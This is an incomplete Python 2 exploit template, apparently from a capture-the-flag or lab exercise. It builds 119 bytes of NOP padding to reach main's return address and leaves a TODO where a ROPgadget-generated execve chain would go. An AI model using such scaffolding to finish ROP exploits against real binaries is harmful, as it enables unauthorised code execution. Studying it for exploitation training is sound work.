#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = ''
p += '\x90'*119 # Offset of ret in main

# TODO:
# Insert the middle part of the generated output

print p
